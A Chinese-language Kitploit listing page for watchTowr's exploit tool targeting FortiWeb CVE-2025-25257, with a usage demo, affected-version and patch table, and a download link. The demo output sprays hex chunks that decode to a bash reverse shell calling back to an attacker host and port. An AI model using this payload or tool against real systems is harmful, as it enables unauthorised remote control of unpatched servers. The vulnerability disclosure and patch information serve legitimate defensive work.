Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
watchTowr-vs-FortiWeb-CVE-2025-25257 — FortiWeb CVE-2025-25257的检测工件生成器,利用未经认证的SQL注入通过十六进制编码的载荷喷射实现远程代码执行。 | Kitploit
工具/GitHubGitHub/watchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubwatchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257

watchTowr-vs-FortiWeb-CVE-2025-25257

FortiWeb CVE-2025-25257的检测工件生成器,利用未经认证的SQL注入通过十六进制编码的载荷喷射实现远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
1002431年前Kitploit 审核通过
分享

watchTowr-vs-FortiWeb-CVE-2025-25257

FortiWeb CVE-2025-25257 检测工件生成器

技术细节请参阅我们的博客文章

https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194

检测演示

root@kitploit:~
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

描述

该脚本尝试检测 FortiWeb 是否存在 CVE-2025-25257 漏洞。

受影响版本

以下 FortiWeb 版本受到影响

版本受影响版本解决方案
FortiWeb 7.67.6.0 through 7.6.3升级到 7.6.4 或更高版本
FortiWeb 7.47.4.0 through 7.4.7升级到 7.4.8 或更高版本
FortiWeb 7.27.2.0 through 7.2.10升级到 7.2.11 或更高版本
FortiWeb 7.07.0.0 through 7.0.10升级到 7.0.11 或更高版本

更多信息请访问 FortiGuard Labs PSIRT

关注 watchTowr Labs

获取最新安全研究,请关注 watchTowr Labs 团队

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
下载工具